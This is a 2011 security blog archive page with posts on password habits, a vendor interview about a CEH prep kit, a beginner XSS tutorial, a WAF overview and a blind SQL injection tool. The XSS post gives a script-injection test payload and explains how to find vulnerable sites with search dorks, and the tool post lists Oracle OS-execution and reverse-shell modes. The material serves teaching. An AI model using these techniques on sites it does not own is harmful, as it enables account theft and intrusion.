    There are a number of ways that you can protect yourself from the possibility of having your password stolen in this manner.

    One simple way would be to make use of sites which feature single sign-on (such as OpenID), or where a single login would let you access multiple services (like your Google account). There are also a number of specialized apps which let you manage multiple online accounts from a single interface.This has the advantage that your credentials are only stored in a single central repository. (Every time you make a copy of a password, the chances of a data breach go up).  Of course, this still leaves you open to a breach in the event that someone steals your password, but at least it makes such breaches more difficult. Also, such a breach might leave suspicious activity patterns that could get flagged and blocked. (ex: Many SaaS providers can block or flag access coming in from a anonymizing proxy)

    The ideal scenario would be to have some sort of multi-factor authentication that requires access from a specified IP address. At the moment, only a few SaaS apps offer this ability.

    If you choose to aggregate your credentials in this manner, you should only do so for low-priority online services. Any services that require the handling of sensitive information should have their own dedicated unique highly-random passwords.

    Another method for managing multiple accounts using a single set of credentials would be to use a single password which is scrambled using a hint that is unique to the account in question. For example, a user whose password is “pUpp1e5” could combine this password with the web site name and create an MD5 hash where the first 10 characters would be the new password.  So the password+site string “pUpp1e5” might hash to “50f49dd6f3f838fb74ca1b7de5898c48”. And the new password would be 50f49dd6f3.
    But the absolute best way to prevent you passwords from being used against you would be to generate and memorize completely random passwords for every account you open. Although this takes a bit of discipline, it’s not as hard as it sounds.

    Many people will rely on mnemonic systems which turn these passwords into easy-to-visualize sentences.
    For example:
    “Y!14gtP” could be turned into “Yolanda surprised 14 green turtles named Peter”
    Although these mnemonic systems are ok for short-term memorization, I’ve found that their effectiveness is overrated. For a number of reasons - which would take too long to go into for this article – I find that there’s no substitute for good old-fashioned memorization through repetition.

    Here is a technique that works for me.
    • Step 1: Generate a random password and memorize it mnemonically or write it down somewhere safe. (Maybe an encrypted file)
    • Step 2: Log in and out 5 times in a row to build muscle memory.
    • Step 3: The next day, log in and out again 5 times using the new password.
    • Step 4: One week later, log in and out again 5 times using the new password.
    You can now go ahead and destroy the written or saved copy of the password. By this point, you should have the password memorized for life. (Or until you’re ready to change it again)
    Now that we’re living in the “cloud age”, users need to be more aggressive than ever when it comes to maintaining effective password management habits.
    About The Author:
    For over ten years, Storagepipe has been providing online server backup services that help companies maintain the safety, security and confidentiality of their private data.

    Continue   Reading>>

    Saturday, October 15, 2011

    Certified Ethical Hacker(CEH) 312-50-v7 Practice Test from Ucertify

    Ethical Hacking Tutorials Blog is introducing a new feature called Certification Preparation Showcase to introduce blog readers to certification preparation education providers and their products. This independent review will highlight the features available in the offerings so that blog readers are aware of the vendors. This blog does not endorse or recommend any specific vendor. Certification candidates should use their best judgment before buying any products or services reviewed on this blog. EC-Council Advisor hopes that Certification Preparation Showcase will assist blog readers in the evaluation of certification related products or services.

    The first product which is being reviewed in the Cert Prep Showcase is uCertify PrepKit from uCertify LLC. The company has been offering certification preparation study kits for more than a decade. The current portfolio covers certification study material for leading companies such Microsoft, EC-Council, Cisco, IBM and others.

    The certification preparation material is available as a download with a list of 15 questions diagnostic test available for free. If you have bought the kit, a license key will reach your e-mail inbox to activate the complete features of the kit. The exam PrepKit consists of a Test Engine with multiple simulated tests. For review purposes, I had downloaded 312-50-v7 Certified Ethical hacker V7 kit. There are 5 full-length practice tests and 1 'Final Test' to prepare oneself for the actual exams. One can also create a custom test and a fixed time test using the question bank in the test engine.

    The test kit also provides nearly 300 flash cards, study notes and tips for taking the exam. The test kit covers all the sections mentioned in the exam content on the certification website. The test engine has been built to closely resemble the testing platform one would encounter for an actual exam. So preparing for a certification exam using the PrepKit will be a familiar experience on exam day. The best benefit of a Test PrepKit like this would be to use as a test simulation tool rather than a guide to learn concepts. There are several EC-Council Press and other publications available for reference guides.

    EC-COUNCIL Advisor: Please tell us about your company. From when did you start offering EC-Council Certification prep kits?

    Jon: uCertify is a leading training provider for the IT Certifications exams. For the past 15 years, uCertify has specialized in exam preparation solutions for all major certification exams, from vendors, such as Microsoft, EC-Council, Adobe, CompTIA, Cisco, EC Council and more. We are available 24 x 7 x 365. All uCertify PrepKits come with a 100% money back guarantee, which is the best in the business. Students pass in their first attempt using our prepkits, else we refund the cost of the prepkit. uCertify is committed to serving its customers with innovative, reliable, and high-quality products through constant research and development, keeping in mind the latest pattern of the various exams. We began offering our prepkits for EC-Council certifications back in 2003. Since then, we have continuously added to the EC-Council test prep suite keeping up with EC-Council’s certification offerings, including all Sun based prepkits.

    EC-Council Advisor: When would you recommend a candidate to start using your prep kit?

    Jon: We recommend that students begin using our prepkits as soon as possible. Our prepkits provides information about exam objectives, lots of study material and dozens of practice questions which not help reinforce concepts, but hones practice skills until they have achieved mastery of the subject.

    EC-COUNCIL Advisor: Tell us how you develop the practice tests?

    Jon: Our prepkits are crafted by industry experts from within uCertify, as well as from the field, They are typically certified professionals themselves, and are subject matter experts in the area of certification they are writing for. These professionals understand the problems that students face while preparing for their certification exams, and ensure that the prepkit material they author helps student pass their certification exam in their first attempts.

    EC-COUNCIL Advisor: You advertise a very high success rate in certification exams (98% plus) for your customers. What makes that possible?

    Jon: uCertify places a very high emphasis on content quality. Our content authors, be it in-house uCertify employees, or contracted IT professionals with relevant experience, are held to extremely high standards. In addition to stringent checklists and peer reviews, several prepkits are also reviewed by ProCertLabs, a company regarded by many certification vendors, as being very qualified to review a test prep provider’s work. Every piece of material in our prepkits is authored and reviewed via a strict checklist to ensure high quality standards.

    EC-COUNCIL Advisor: What advise would you give to EC-Council certification candidates preparing for certification exams?

    Jon: Practice, Practice, Practice! Invest in a high quality prepkit provider such as uCertify, and go through all study material, and take/retake the tests until they score 95% or higher in all the practice tests they take. Readers of EC-COUNCIL blog can use discount code: UCPREP when checking out and avail of a 10% discount. 
    Continue   Reading>>

    Friday, October 14, 2011

    Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

    What is XSS?
    Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

    In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.
    Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.
    It will be easy to understand XSS , if you have the following prerequisite:
    • Strong Knowledge in HTML,javascript(Reference).
    • Basic Knowledge in HTTP client-Server Architecure(Reference)
    • [optional]Basic Knowledge about server side programming(php,asp,jsp)

    XSS Attack:
    Step 1: Finding Vulnerable Website
    Hackers use google dork for finding the vulnerable sites for instance  "?search=" or ".php?q=" .  1337 target specific sites instead of using google search.  If you are going to test your own site, you have to check every page in your site for the vulnerability.

    Step 2: Testing the Vulnerability:
    First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

    Test 1 :
    Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the  result .

    Now right click on the page and select view source.   search for the string "BTS" which we entered in the input field.  Note the location where the input is placed.

    Test 2:
    Now we are going to check whether the server sanitize our input or not.  In order to do this , let us input the <script> tag inside the input field.
    View the source of the page . Find the location where input displayed place in previous test.

    Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &lt;script&gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

    Step 3: Exploiting the vulnerability
    Now we know the site is somewhat vulnerable to XSS attack.  But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code.  For instance, let us input <script>alert('BTS')</script> .

    Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS .  By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

    Types of XSS Based on persisting capability:
    Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

    Persistent XSS:

    The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

    For Example:   
    Many websites host a support forum where registered users can ask their doubts by posting message  , which are stored in the database.  Let us imagine , An attacker post a message containing malicious javascript code instead.  If the server fail to sanitize the input provided, it results in execution of injected script.  The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.

    Non-Persistent XSS:

    Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest.  The server embedd the input with the html file and return the file(HTTPResponse) to browser.  When the browser executes the HTML file, it also execute the embedded script.  This kind of XSS vulnerability frequently occur in search fields.

    Let us consider a project hosting website.  To find our favorite project, we will just input the related-word in the search box .  When searching is finished, it will display a message like this "search results for yourword " .  If the server fail to sanitize the input properly, it will results in execution of injected script.

    In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser.  The browser then executes the code .

    In addition to these types, there is also third  type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

    What can an attacker do with this Vulnerability?
    • Stealing the Identity and Confidential Data(credit card details).
    • Bypassing restriction in websites.
    • Session Hijacking(Stealing session)
    • Malware Attack
    • Website Defacement
    • Denial of Service attacks(Dos)

    This article is intended for educational purpose only.
    Continue   Reading>>

    Wednesday, October 12, 2011

    Introduction to Web Application Firewall (WAF) ~ Website Security

    What is WAF?WAF is expanded as Web Application Firewall. WAF is server side application that controls the input and output(filter the HTTP communication).  It controls network traffic on any OSI Layer up to Application Layer.  The main purpose of WAF is to provide better protection over the top Wep Application vulnerability such as XSS(Cross Site Scripting), SQL Injection,RFI.  Daily lot of websites hacked because of these vulnerability.  Read Our Security News Section to know about the Security Risks in Interent.  Standard firewall blocks Non-HTTP attacks(restriction of ports,access..).  This WAF blocks HTTP attack.

    The Most common Web Application Vulnerabilities:

    • SQL Injection(SQLi)
    • Cross-Site Scripting (XSS)
    • Broken Authentication and Session Management
    • Insecure Direct Object References
    • Cross-Site Request Forgery (CSRF)
    • Security Misconfiguration
    • Insecure Cryptographic Storage
    • Failure to Restrict URL Access
    • Insufficient Transport Layer Protection
    • Unvalidated Redirects and Forwards

    The Wep Application Firewall(WAF) must meat the following features:
    • Protection Against Top Vulnerability(XSS,SQLi,..etc)
    • Very Few False Positives (i.e., should NEVER disallow an authorized request)
    • Strength of Default (Out of the Box) Defenses
    • Power and Ease of Learn Mode
    • Types of Vulnerabilities it can prevent.
    • Detects disclosure and unauthorized content in outbound reply messages, such as credit-card and Social Security numbers.
    • Both Positive and Negative Security model support.
    • Simplified and Intuitive User Interface.
    • Cluster mode support.
    • High Performance (milliseconds latency).
    • Complete Alerting, Forensics, Reporting capabilities.
    • Web Services\XML support.
    • Brute Force protection.
    • Ability to Active (block and log), Passive (log only) and bypass the web trafic.
    • Ability to keep individual users constrained to exactly what they have seen in the current session
    • Ability to be configured to prevent ANY specific problem (i.e., Emergency Patches)
    • Form Factor: Software vs. Hardware (Hardware generally preferred)
    Top 10 Open Source Web Application Firefwall(WAF):

    1. ModSecurity (Trustwave SpiderLabs)
    2. AQTRONIX WebKnight
    3. ESAPI WAF
    4. WebCastellum
    5. BinarySec
    6. Guardian@JUMPERZ.NET
    7. OpenWAF
    8. Ironbee
    9. Profense
    10. Smoothwall
    Continue   Reading>>

    Tuesday, October 11, 2011

    Automated Blind SQL Injection Attacking Tools~bsqlbf Brute forcer

    What is Blind SQL Injection:
    Some Websites are vulnerable to SQL Injection but the results of injection are not visible to the attacker.  In this situation, Blind SQL Injection is used. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered.

    There are plenty of automated Blind Sql Injection tool available. Here i am introducing one of Tool named as bsqlbf(expanded as Blind Sql Injection Brute Forcer).

    This tool is written in Perl and allows extraction of data from Blind SQL Injections. It accepts custom SQL queries as a command line parameter and it works for both integer and string based injections
    Supported Database:
    • MS-SQL
    • MySQL
    • PostgreSQL
    • Oracle

    The tool supports 8 attack modes(-type switch):-
    Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

    Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

    Type 2: Blind SQL Injection in "order by" and "group by".

    Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

    Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

    Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

    Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

    Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

    -cmd=revshell Type 7 supports meterpreter payload execution, run generator.exe first

    Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions

    -cmd=revshell Type 8 supports meterpreter payload execution, run generator.exe first

    For Type 4(O.S code execution) the following methods are supported:

    -stype: How you want to execute command:

    SType 0 (default) is based on java..will NOT work against XE.

    SType 1 is against oracle 9 with plsql_native_make_utility.

    SType 2 is against oracle 10 with dbms_scheduler.

    This Article is for Education purpose only.  The above mentioned software is developed for Penetration testers to test their own Web application Vulnerability. 
    Continue   Reading>>
    Older Post Home

    © Break The Security. Copyright 2008 All Rights Reserved Revolution Two Church theme by Brian Gardner Converted into Blogger Template by Bloganol dot com